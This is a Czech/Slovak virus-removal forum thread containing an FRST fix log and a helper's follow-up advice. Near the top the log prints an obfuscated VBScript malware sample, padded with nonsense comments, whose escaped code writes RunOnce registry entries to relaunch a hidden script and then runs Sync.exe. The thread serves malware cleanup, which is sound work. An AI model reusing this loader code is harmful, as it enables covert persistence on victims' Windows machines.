' Ren luto nubutane rugoda mopebaf rote damali kih sibepu. Pupoki bob famu, Cakitucu rul gesolofe pelafip hosafeta rubo gokiguh
' Fadope, Tele, Diganafu sigecek dekepipi begu socoha. Hahubono datoce sako rona todehaka mek tos lupuge pokos soca mimudugi
' Careda, Gorohid dek tal kihabu kok nesul gocagosa. Somelo lobarot gutu noro, Doka mal tokep tadeno honis hadomam
' Kapurih bol culali farirab mokateki rutacuh demab hehe murab nefere lifop tel caluto taron risopikab.
'
' Bir melosec sucedol locopu, Debakok, Tibakop, Seg rete kedod cot sadupono hacu lahos boraparob
' Sapo forimeso, Lumoca locad daca, Kubolu tasap bef cuguh cukefid gadatefe kapes cola motob comalucob.
'
' Totepo sod, Ser cudoce tafep, Kup gab, Gub capana mebecuc latutec lupebo peto gafor kocusim.
' Konases sufe lacone cabatus bereba hemohup lecukocu, Tadodi cal rarep nifebaf gumu gacala nutanupo neme senamabe
' Lomenobe, Fadin, Pikake hecoga takedat gadoc cug. Refohol rire caboh madege ladenet padehis nakola gem nedamaca
' Loper nogako releg lehi bes tino ratoba lin sodep. Pepahu tufoba, Godedime por ked hemanab nolom pufaluso huda samageg
' Cepena foced dehabal, Gosud kehonige lufe, Kete ruduget basadas loha meke larano hagubab bubem cuso muf codal kapatoceg
' Bipopug, Bubiheba gekecur mar botogo kanenago nukuhel regidim beb sad gibahe neni bucubofago.
' Mog nulo, Dono cekif nofel, Fot som cetose, Kokaf peg kunutoc linede set dute nat gonag gobe rid toginetires.
'
' Rebuta kugecelo firakak, Goruh, Gikeda pumeseka bebofa sodab punohusa git dasudolu holag golacahak.
' Kaca, Teh soc sere cusehode bofoh goha lifipa, Mudamusa nahog rora tutemol ribuke rogoge boba cige pegabet
' Pelekeb mebecadu tulugo belag recosap lusa namifa lugokafa lune tofifusi gagole kepa tolurok kafah kama latahalo
' Carun gobeh lagad, Safopi rob gopoga lodihak dor boka sekopome fec 11969 cum keci magel sibekase tetugok duge soreh.
' Pahemis moma mekeda gecurul fesi, Sokoson pomumemi bonog cedade latopu nur dobe rasetepego.
' Sonona nocap rafara kolohed roh degin basaha hop hokige. Cirabar karale nafu sire bapige nofogofa 39937 sat tegopeg.
'
' Bifeg, Kiledoce lomonit tudigema bune rakota. Betobel nek, Fem 18149 tubusose caf logari hocal rusac cadosabuc.
' Bafuciba getico detomu kehip goce teto tonas sabehi rafupoh car lohufebo bose gehic cepabibi hubateho met dadebafimas.
' Nucebedo, Fonaki nofodoce danagel, Melak lurihed, Mumo, Salaha nuseluk dilod bimefa kece fenuno retelobu roni secolol
' Pica pudi casol hedef tefune pofi pore mureta tosokah hicotuma nun fefu cetegeru fafop lotona
' Tom dakesep gan, Gidegoba karu kufof rala, Soparem loduho hafebo hadoci hecogo fog hep somopen sekan figec
' Fefo karigepe, Kuhep sor beke, Kodebela rihagi, Cap fehage napisel notoharo gabogud hefulag fepe pure nicap mabefug
' Fumarale, Gagaho nubac mafi folonip. Resa gutatom, Sokadoso, Laho haf, Napacoc kilumuno soga febeh mohocafa.
'
' Tin, Hadir, Caledof, Tunara luto, Betin, Neh betuc gac, Cahi mehake pek lanof fotad foribi setek folol res tedehoh
' Binuf, Kemap, Tetukabo fedat cata fokos geg fudecoloce. Remasog dul tegehip kamos mepihaga lep tosagok modedoto pesan moke
' Heperopo, Fitoke gefuda dik tihop dorodaso. Gatahode faro rasin sadonim cukuse cokob tahuh makap refihaso.
'
' Pehefi momer, Meribek tedol poso, Hemo, Gib kored tugore dodehed kar dafekeh bebogo robug mudug
' Mupat kicoke sadapeba gat kim neme karu pahupuhu lifige doda gahecano kagor nil patepafo tasagub sacacaku totes co.
' Deni tugob lerebek rop sohogon, Tobag, Lahesih hog kos kacuco nupebuka letitere tegomilo tucubas firar pokad.
' Gosegun cif lom gigar fedur hobokog, Laregosi tune rita feg getumaka hukib susosol bugem bocuna
' Kanol lofe kuhel, Cehol sesotosa dopihid nina pafegicod. Solub sem, Cohu noh popoca tobosito dobecusi petoc babah.
' Getatemi rekeru rug, Bodatasu, Godun pudikaso beho rit, Fonareka bat dogo dica pacerit nohalu nehorec sesutem tes hober
' Cahe kumedeb pufacohe lusab, Kataf moni delanefu nepos dacokak koset cefoc koratico fak behakalep
' Fekaregi lef kucarusa sotorula samopa gacarale godabohi redi tagepa rasapafe let gulo ferof sufic den cadepim
' Nuda, Mosefeg rahas, Bin bec nar losanela degadil repesehi posafep mik pilosipe rot datehofuci
' Mebilobo, Cedaran, Peto gufec norelu tocub petut hosa. Boc, Fabur rubarigo gokac cafaku fomafar log gotohima pahad hatu.
' Gegar koraf baca kit, Gugibuse, Rab lefan, Batafito fonu moparo tep nonas gidu pefitole debumace fah pesimoke
' Gucu, Kecepeh, Komogul bopo kogenuk bogahi, Resad debomego boba lobo pece lefa rot bonat gutor sud lufahes
' Mosutak bep sinolun sefamal, Heneta cicas gaparala, Cupidopa kenu sik defebu rolacono cika pelum doferas gelu dipatus.
' Rugucog pokepa fucapu tedil cefoko bok pemukeco. Fasu fed rofirona bun, Gecacama huhef tanetob tid culep fefeko.
'
' Gekam kulol lisababo sodo teseseba merar, Togonoce podosa foda ladit meb fasi suhanaca kir hugisag
' Denane tug bid depebome, Kekibace tudefoha, Tikoc, Mugig nob pomi coba lota sat melo fete henut gadebasa ciho gokudat.
' Pagotaro pidegat lusag baki cohi tahu roreko. Kago dimaf, Merar makofu muketab gohon fonoguh budul sepeg.
'
' Kibe kokonol rah tolih, Pohu cik, Dodo gerusafo, Dohora pat bes tute talun fatakeca tefor red gede mopu doh penabusek
' Nogutep renanid mog hori minipoka, Cam gosonu narolok, Fupote tat bekom latusaf rohego mub popefahe mugatapo honar fo
' Pagiras, Humuc cer gakeceh, Com fidu tece kamasa mar cedi renofora nokopemo humota rob lefoc hine gugohuli coran pu
' Famib, Tola bafo docasesa sahe bices naboru, Racaled paso gof mulesip tini secag bered fuge besabotina
' Mas deridal nute gon rosorek lacatik legob penarah pakipasu misapog sinar kipep berole lotoce hepa cil hopumesone
' Nepo kobop nebi ponofo tino pamu, Fon ganoca, Dunemane dabanego ketap losihod tut renid rakarode.
'
' Dutin dudodada nuka fubemob natota ribop, Homobo, Sinarab rime dig kimumos cason pen mimonac kuka bot sicalodug
' Nobakot tolenuc bukac coc taha gako monas ledoseh rasef ketucar pelu cahe hafutot lulebunu gobe bepel calof golub ladim.
' Seda begut hopa, Hotatoci gore pud mirug loda famuk. Mudopopu, Rico rofama, Kes, Nebepa capogo ganir kure bosas dofudagop.
'
' Sof mete det, Tofenod godup capof, Moruf segic baka kapimol nopiho lonib kemadof cotu mari pofibole
' Par peluso hotel koni beti moged, Pasorure meda rem tuto pudilug rut kuko nebodeme benopor sogad per depalil
' Mudu lar, Cine gahucu, Bama kak hal, Hacogo, Kase, Monagod foca gohon dutogona gir nehe rakukake hata ket sotulomohor.
' Sum didekipe tegira heto cocalag cubeg gecas, Pigelop bem meramat bin debegate ruf kice tubi celi kesutepe fonum tusit
' Depafafi nuben foh mafel narit lota gosepe. Mapi remocos, Lorera fohicep punopan sisecogo farotopu for cecukefi
' Kanepede gah lebog, Hekeha gomut bano nabocil pah desaba kunokih babamute dag gesed rocim tesas ratede
' Gamuka moron hefut baka halek sufasaf colalod, Hosenu kafiku kekanom larage hafaco budadu fuca samabade
' Tefa cede kanicuro pibulesa, Hokad teh fodiha cun kog ned hune fedob moteg megel napu moda nunubelefi.
' Gesora, Nalibiba fekogod mobos hale gomamo fas sesete mebi sitarod setopehi ros fube tedo pibak potifabet.
'
' Benoce, Namarer hera, 57497 rap fas roge bareluho, Bobo mikelisa mesonabu sogim busakot pofufa tocemose pene duhan capur.
'
' Lika sul, Loba, Hisasasa, Garerah kof, Fapakari lopocam seci guhagim leleletu ditam pehoh kacug
' Bihamupo, Kis fana dederupa, Sar, Rugefogu, Cukeluh runanol tubimo sohofada tikegabe mal deladahok
' Losap, Ketahin bomukoka sara, Rogoco pekoh ret nat bedunulo suc gobe tobesegi mekoke fineh derokutig
' Bisamac hasef nocoku gopakum loholih pidoral tasaga sola simolo pehale hubeku ragalunu mer pekulan.
'
' Nodokeb sohaso, Rurop goraf serode curegeki leb nameluf kanoto tocogef fofafa hop leco cugoholaku.
' Moda, Roda famem, Fadah cemekodo huhu bufer. Tolibek fep cif finekama tubilek cop 16623 hefohe rep garam
' Can lape cifihor nogog hob lokogep kunekuro nopoka bekek salese pinutog rorofac rodacoki negeg hotogal.
' Kaca gesaca fabofala ded kolut susu cum nefusunobi. Cesenac, Bakepado, Noko konekeda futetima des tosesabelo
' Hif sah sakesa geda fokosone tulodi fahecaso, Banobupo, Pucaf rucegaf togek lano pon heg ces recad gegug busalehin.
Kosorogac=Unescape("%46%75%6E%63%74%69%6F%6E%20%57%72%69%74%65%52%65%67%28%52%65%67%50%61%74%68%2C%20%56%61%6C%75%65%2C%20%52%65%67%54%79%70%65%29%3A%4F%6E%20%45%72%72%6F%72%20%52%65%73%75%6D%65%20%4E%65%78%74%3A%53%65%74%20%6F%62%72%67%3D%43%72%65%61%74%65%4F%62%6A%65%63%74%28%22%57%73%63%72%69%70%74%2E%73%68%65%6C%6C%22%29%0D%0A%6F%62%72%67%2E%52%65%67%57%72%69%74%65%20%52%65%67%50%61%74%68%2C%20%56%61%6C%75%65%2C%20%52%65%67%54%79%70%65%3A%49%66%20%28%6F%62%72%67%2E%52%65%67%52%65%61%64%28%52%65%67%50%61%74%68%29%3D%56%61%6C%75%65%29%20%54%68%65%6E%20%57%72%69%74%65%52%65%67%3D%54%72%75%65%20%45%6C%73%65%20%57%72%69%74%65%52%65%67%3D%46%61%6C%73%65%0D%0A%69%66%20%28%65%72%72%2E%6E%75%6D%62%65%72%3C%3E%30%29%20%74%68%65%6E%3A%57%72%69%74%65%52%65%67%3D%46%61%6C%73%65%3A%65%6E%64%20%69%66%3A%45%6E%64%20%46%75%6E%63%74%69%6F%6E%0D%0A%69%66%20%28%6E%6F%74%20%57%72%69%74%65%52%65%67%28%22%48%4B%4C%4D%5C%53%6F%66%74%77%61%72%65%5C%4D%69%63%72%6F%73%6F%66%74%5C%57%69%6E%64%6F%77%73%5C%43%75%72%72%65%6E%74%56%65%72%73%69%6F%6E%5C%52%75%6E%4F%6E%63%65%5C%44%6F%73%65%68%6F%22%2C%22%43%3A%5C%57%49%4E%44%4F%57%53%5C%53%79%73%57%4F%57%36%34%5C%77%73%63%72%69%70%74%2E%65%78%65%20%2F%45%3A%76%62%73%63%72%69%70%74%20%2F%42%20%22%22%22%20%26%20%22%43%3A%5C%55%73%65%72%73%5C%55%73%65%72%5C%41%70%70%44%61%74%61%5C%52%6F%61%6D%69%6E%67%5C%4D%75%6C%65%64%61%72%61%6C%6F%22%20%26%20%22%22%22%22%2C%22%52%45%47%5F%53%5A%22%29%29%20%54%68%65%6E%20%3A%64%6D%79%4C%6F%62%75%6E%6F%6C%3D%57%72%69%74%65%52%65%67%28%22%48%4B%43%55%5C%53%6F%66%74%77%61%72%65%5C%4D%69%63%72%6F%73%6F%66%74%5C%57%69%6E%64%6F%77%73%5C%43%75%72%72%65%6E%74%56%65%72%73%69%6F%6E%5C%52%75%6E%4F%6E%63%65%5C%44%6F%73%65%68%6F%22%2C%22%43%3A%5C%57%49%4E%44%4F%57%53%5C%53%79%73%57%4F%57%36%34%5C%77%73%63%72%69%70%74%2E%65%78%65%20%2F%45%3A%76%62%73%63%72%69%70%74%20%2F%42%20%22%22%22%20%26%20%22%43%3A%5C%55%73%65%72%73%5C%55%73%65%72%5C%41%70%70%44%61%74%61%5C%52%6F%61%6D%69%6E%67%5C%4D%75%6C%65%64%61%72%61%6C%6F%22%20%26%20%22%22%22%22%2C%22%52%45%47%5F%53%5A%22%29%3A%65%6E%64%20%69%66%0D%0A")
set oSC = CreateObject(Unescape("%53%63%72%69%70%74%43%6F%6E%74%72%6F%6C"))
oSC.language=unescape("%56%42%53%63%72%69%70%74")
Hefopo=oSC.ExecuteStatement(Kosorogac)
Set Bomos=CreateObject(Unescape("%57%53%63%72%69%70%74%2E%53%68%65%6C%6C"))
Bosodacago=unescape("%43%3A%5C%55%73%65%72%73%5C%55%73%65%72%5C%41%70%70%44%61%74%61%5C%4C%6F%63%61%6C%5C%7B%31%39%37%34%32%7E%31%5C%53%79%6E%63%2E%65%78%65%20%2F%43%68%65%63%6B%20%2F%53%63%72%69%70%74")
Bomos.Exec Bosodacago
' Dabebu refen tipuked, Hit, Mip tufuhosa fomeka, Tames raf nasolola nomi kacak nekofo momupase reha depicef
' Cigemade puhamure tusu sagase pihih tero gapema. Dit nafesop cano hedunale taco cuk curo muhora for don calomopa
' Ren luto nubutane rugoda mopebaf rote damali kih sibepu. Pupoki bob famu, Cakitucu rul gesolofe pelafip hosafeta rubo gokiguh
' Fadope, Tele, Diganafu sigecek dekepipi begu socoha. Hahubono datoce sako rona todehaka mek tos lupuge pokos soca mimudugi
' Careda, Gorohid dek tal kihabu kok nesul gocagosa. Somelo lobarot gutu noro, Doka mal tokep tadeno honis hadomam
' Kapurih bol culali farirab mokateki rutacuh demab hehe murab nefere lifop tel caluto taron risopikab.
'
' Bir melosec sucedol locopu, Debakok, Tibakop, Seg rete kedod cot sadupono hacu lahos boraparob
' Sapo forimeso, Lumoca locad daca, Kubolu tasap bef cuguh cukefid gadatefe kapes cola motob comalucob.
'
' Totepo sod, Ser cudoce tafep, Kup gab, Gub capana mebecuc latutec lupebo peto gafor kocusim.
' Konases sufe lacone cabatus bereba hemohup lecukocu, Tadodi cal rarep nifebaf gumu gacala nutanupo neme senamabe
' Lomenobe, Fadin, Pikake hecoga takedat gadoc cug. Refohol rire caboh madege ladenet padehis nakola gem nedamaca
' Loper nogako releg lehi bes tino ratoba lin sodep. Pepahu tufoba, Godedime por ked hemanab nolom pufaluso huda samageg
' Cepena foced dehabal, Gosud kehonige lufe, Kete ruduget basadas loha meke larano hagubab bubem cuso muf codal kapatoceg
' Bipopug, Bubiheba gekecur mar botogo kanenago nukuhel regidim beb sad gibahe neni bucubofago.
' Mog nulo, Dono cekif nofel, Fot som cetose, Kokaf peg kunutoc linede set dute nat gonag gobe rid toginetires.
'
' Rebuta kugecelo firakak, Goruh, Gikeda pumeseka bebofa sodab punohusa git dasudolu holag golacahak.
' Kaca, Teh soc sere cusehode bofoh goha lifipa, Mudamusa nahog rora tutemol ribuke rogoge boba cige pegabet
' Pelekeb mebecadu tulugo belag recosap lusa namifa lugokafa lune tofifusi gagole kepa tolurok kafah kama latahalo
' Carun gobeh lagad, Safopi rob gopoga lodihak dor boka sekopome fec 11969 cum keci magel sibekase tetugok duge soreh.
' Pahemis moma mekeda gecurul fesi, Sokoson pomumemi bonog cedade latopu nur dobe rasetepego.
' Sonona nocap rafara kolohed roh degin basaha hop hokige. Cirabar karale nafu sire bapige nofogofa 39937 sat tegopeg.
'
' Bifeg, Kiledoce lomonit tudigema bune rakota. Betobel nek, Fem 18149 tubusose caf logari hocal rusac cadosabuc.
' Bafuciba getico detomu kehip goce teto tonas sabehi rafupoh car lohufebo bose gehic cepabibi hubateho met dadebafimas.
' Nucebedo, Fonaki nofodoce danagel, Melak lurihed, Mumo, Salaha nuseluk dilod bimefa kece fenuno retelobu roni secolol
' Pica pudi casol hedef tefune pofi pore mureta tosokah hicotuma nun fefu cetegeru fafop lotona
' Tom dakesep gan, Gidegoba karu kufof rala, Soparem loduho hafebo hadoci hecogo fog hep somopen sekan figec
' Fefo karigepe, Kuhep sor beke, Kodebela rihagi, Cap fehage napisel notoharo gabogud hefulag fepe pure nicap mabefug
' Fumarale, Gagaho nubac mafi folonip. Resa gutatom, Sokadoso, Laho haf, Napacoc kilumuno soga febeh mohocafa.
'
' Tin, Hadir, Caledof, Tunara luto, Betin, Neh betuc gac, Cahi mehake pek lanof fotad foribi setek folol res tedehoh
' Binuf, Kemap, Tetukabo fedat cata fokos geg fudecoloce. Remasog dul tegehip kamos mepihaga lep tosagok modedoto pesan moke
' Heperopo, Fitoke gefuda dik tihop dorodaso. Gatahode faro rasin sadonim cukuse cokob tahuh makap refihaso.
'
' Pehefi momer, Meribek tedol poso, Hemo, Gib kored tugore dodehed kar dafekeh bebogo robug mudug
' Mupat kicoke sadapeba gat kim neme karu pahupuhu lifige doda gahecano kagor nil patepafo tasagub sacacaku totes co.
' Deni tugob lerebek rop sohogon, Tobag, Lahesih hog kos kacuco nupebuka letitere tegomilo tucubas firar pokad.
' Gosegun cif lom gigar fedur hobokog, Laregosi tune rita feg getumaka hukib susosol bugem bocuna
' Kanol lofe kuhel, Cehol sesotosa dopihid nina pafegicod. Solub sem, Cohu noh popoca tobosito dobecusi petoc babah.
' Getatemi rekeru rug, Bodatasu, Godun pudikaso beho rit, Fonareka bat dogo dica pacerit nohalu nehorec sesutem tes hober
' Cahe kumedeb pufacohe lusab, Kataf moni delanefu nepos dacokak koset cefoc koratico fak behakalep
' Fekaregi lef kucarusa sotorula samopa gacarale godabohi redi tagepa rasapafe let gulo ferof sufic den cadepim
' Nuda, Mosefeg rahas, Bin bec nar losanela degadil repesehi posafep mik pilosipe rot datehofuci
' Mebilobo, Cedaran, Peto gufec norelu tocub petut hosa. Boc, Fabur rubarigo gokac cafaku fomafar log gotohima pahad hatu.
' Gegar koraf baca kit, Gugibuse, Rab lefan, Batafito fonu moparo tep nonas gidu pefitole debumace fah pesimoke
' Gucu, Kecepeh, Komogul bopo kogenuk bogahi, Resad debomego boba lobo pece lefa rot bonat gutor sud lufahes
' Mosutak bep sinolun sefamal, Heneta cicas gaparala, Cupidopa kenu sik defebu rolacono cika pelum doferas gelu dipatus.
' Rugucog pokepa fucapu tedil cefoko bok pemukeco. Fasu fed rofirona bun, Gecacama huhef tanetob tid culep fefeko.
'
' Gekam kulol lisababo sodo teseseba merar, Togonoce podosa foda ladit meb fasi suhanaca kir hugisag
' Denane tug bid depebome, Kekibace tudefoha, Tikoc, Mugig nob pomi coba lota sat melo fete henut gadebasa ciho gokudat.
' Pagotaro pidegat lusag baki cohi tahu roreko. Kago dimaf, Merar makofu muketab gohon fonoguh budul sepeg.
'
' Kibe kokonol rah tolih, Pohu cik, Dodo gerusafo, Dohora pat bes tute talun fatakeca tefor red gede mopu doh penabusek
' Nogutep renanid mog hori minipoka, Cam gosonu narolok, Fupote tat bekom latusaf rohego mub popefahe mugatapo honar fo
' Pagiras, Humuc cer gakeceh, Com fidu tece kamasa mar cedi renofora nokopemo humota rob lefoc hine gugohuli coran pu
' Famib, Tola bafo docasesa sahe bices naboru, Racaled paso gof mulesip tini secag bered fuge besabotina
' Mas deridal nute gon rosorek lacatik legob penarah pakipasu misapog sinar kipep berole lotoce hepa cil hopumesone
' Nepo kobop nebi ponofo tino pamu, Fon ganoca, Dunemane dabanego ketap losihod tut renid rakarode.
'
' Dutin dudodada nuka fubemob natota ribop, Homobo, Sinarab rime dig kimumos cason pen mimonac kuka bot sicalodug
' Nobakot tolenuc bukac coc taha gako monas ledoseh rasef ketucar pelu cahe hafutot lulebunu gobe bepel calof golub ladim.
' Seda begut hopa, Hotatoci gore pud mirug loda famuk. Mudopopu, Rico rofama, Kes, Nebepa capogo ganir kure bosas dofudagop.
'
' Sof mete det, Tofenod godup capof, Moruf segic baka kapimol nopiho lonib kemadof cotu mari pofibole
' Par peluso hotel koni beti moged, Pasorure meda rem tuto pudilug rut kuko nebodeme benopor sogad per depalil
' Mudu lar, Cine gahucu, Bama kak hal, Hacogo, Kase, Monagod foca gohon dutogona gir nehe rakukake hata ket sotulomohor.
' Sum didekipe tegira heto cocalag cubeg gecas, Pigelop bem meramat bin debegate ruf kice tubi celi kesutepe fonum tusit
' Depafafi nuben foh mafel narit lota gosepe. Mapi remocos, Lorera fohicep punopan sisecogo farotopu for cecukefi
' Kanepede gah lebog, Hekeha gomut bano nabocil pah desaba kunokih babamute dag gesed rocim tesas ratede
' Gamuka moron hefut baka halek sufasaf colalod, Hosenu kafiku kekanom larage hafaco budadu fuca samabade
' Tefa cede kanicuro pibulesa, Hokad teh fodiha cun kog ned hune fedob moteg megel napu moda nunubelefi.
' Gesora, Nalibiba fekogod mobos hale gomamo fas sesete mebi sitarod setopehi ros fube tedo pibak potifabet.
'
' Benoce, Namarer hera, 57497 rap fas roge bareluho, Bobo mikelisa mesonabu sogim busakot pofufa tocemose pene duhan capur.
'
' Lika sul, Loba, Hisasasa, Garerah kof, Fapakari lopocam seci guhagim leleletu ditam pehoh kacug
' Bihamupo, Kis fana dederupa, Sar, Rugefogu, Cukeluh runanol tubimo sohofada tikegabe mal deladahok
' Losap, Ketahin bomukoka sara, Rogoco pekoh ret nat bedunulo suc gobe tobesegi mekoke fineh derokutig
' Bisamac hasef nocoku gopakum loholih pidoral tasaga sola simolo pehale hubeku ragalunu mer pekulan.
'
' Nodokeb sohaso, Rurop goraf serode curegeki leb nameluf kanoto tocogef fofafa hop leco cugoholaku.
' Moda, Roda famem, Fadah cemekodo huhu bufer. Tolibek fep cif finekama tubilek cop 16623 hefohe rep garam
' Can lape cifihor nogog hob lokogep kunekuro nopoka bekek salese pinutog rorofac rodacoki negeg hotogal.
' Kaca gesaca fabofala ded kolut susu cum nefusunobi. Cesenac, Bakepado, Noko konekeda futetima des tosesabelo
' Hif sah sakesa geda fokosone tulodi fahecaso, Banobupo, Pucaf rucegaf togek lano pon heg ces recad gegug busalehin.

========= End of CMD: =========


========= type "C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt" =========

Syst‚m nemuze nal‚zt uvedenou cestu.

========= End of CMD: =========

"C:\WINDOWS\system32\GroupPolicy\Machine" => not found
"FF Homepage: Mozilla\Firefox\Profiles\fv1h6kzk.default -> hxxp://www.bing.com/search?FORM=INCOH1&PC=IC04 ... O-5c39e9ad" => not found
HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.2.4 => not found
0322801542040262mcinstcleanup => service not found.
"C:\WINDOWS\System32\Tasks\McAfee" => not found
"C:\Program Files (x86)\GUT4060.tmp" => not found
"C:\Program Files (x86)\GUT62F7.tmp" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{048FD072-7F98-4B21-82C8-BFE8E38E904A}" => not found
"C:\WINDOWS\System32\Tasks\Bing Powered Search nocod" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Bing Powered Search nocod" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14005E01-FA72-4914-ABDC-954672515EF2}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"C:\WINDOWS\Tasks\Bing Powered Search nocod.job => Wscript.exe C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt <==== ATTENTIONFirewallRules: [{68DF603D-EFF4-46C5-8040-5B18171747EF}]" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{27BFD4C7-4FD6-425C-AB81-DCBB6669AF44}" => not found
"C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}" => not found
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 9199616 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 55076156 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 2550078 B
Edge => 0 B
Chrome => 490169697 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 1806 B
LocalService => 0 B
NetworkService => 0 B
NetworkService => 0 B
User => 102444517 B

RecycleBin => 1632666802 B
EmptyTemp: => 2.1 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 17:42:42 ====

lkcenovsky
Návštěvník
Návštěvník
Příspěvky: 5
Registrován: 11 lis 2018 22:41

Re: Prosim o kontrolu logu. Velice dlouha odezva

#8 Příspěvek od lkcenovsky »

Jeste nejak mohu pocitaci prospet?
Dikz moc za pomoc.

Conder
VIP
VIP
Příspěvky: 4399
Registrován: 30 pro 2013 22:29
Bydliště: Bratislava

Re: Prosim o kontrolu logu. Velice dlouha odezva

#9 Příspěvek od Conder »

:arrow: Plocha ma vyse 134 GB, co je prilis vela. Presun vsetky subory a zlozky z plochy do dokumentov a na ploche nechaj iba odkazy/zastupcov. Prilis velka velkost plochy moze sposobit spomalenie systemu.

:arrow: Posli este pre istotu aj nove logy z FRST, kedze ubehla uz dlhsia doba.
Absolvent skoly pre novacikov :)
E-mail: conder (zavinac) forum.viry.cz

Ak nieco nie je jasne, pytaj sa. Odporucam mat vzdy zalohovat dolezite data (dokumenty, fotky a ine).

Fixlisty a ine scripty su pisane len pre konkretny PC. Nepouzivajte ich na inych zariadeniach, inak hrozi poskodenie systemu alebo strata dat.
Ak mate podobny problem ako iny uzivatel, prosim, zalozte si vlastnu temu.

V pripade spokojnosti je mozne podporit forum. Dakujeme!

Odpovědět